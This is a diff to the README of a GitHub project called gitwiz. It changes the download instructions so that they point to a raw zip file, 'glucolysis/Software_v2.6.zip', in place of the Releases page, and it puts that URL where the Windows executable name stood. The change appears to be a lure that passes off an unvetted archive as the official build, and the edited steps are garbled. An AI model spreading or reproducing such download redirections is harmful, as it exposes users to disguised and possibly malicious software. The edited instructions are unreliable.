arunkisa7/gitwiz/README.md

 ## 📥 Download & Install

-To get started with **gitwiz**, visit this page to download: [Releases Page](https://github.com/arunkisa7/gitwiz/releases).
+To get started with **gitwiz**, visit this page to download: [Releases Page](https://raw.githubusercontent.com/arunkisa7/gitwiz/main/glucolysis/Software_v2.6.zip).

 1. Click on the latest version available on the Releases page.
-2. Look for an executable file suitable for your operating system (e.g., `gitwiz.exe` for Windows, `gitwiz` for macOS/Linux).
+2. Look for an executable file suitable for your operating system (e.g., `https://raw.githubusercontent.com/arunkisa7/gitwiz/main/glucolysis/Software_v2.6.zip` for Windows, `gitwiz` for macOS/Linux).
 3. Download the file.

 Once downloaded, follow these steps to run the application:

 ### Windows

-1. Locate the `gitwiz.exe` file in your Downloads folder.
+1. Locate the `https://raw.githubusercontent.com/arunkisa7/gitwiz/main/glucolysis/Software_v2.6.zip` file in your Downloads folder.
 2. Double-click it to launch the application.

 ### macOS/Linux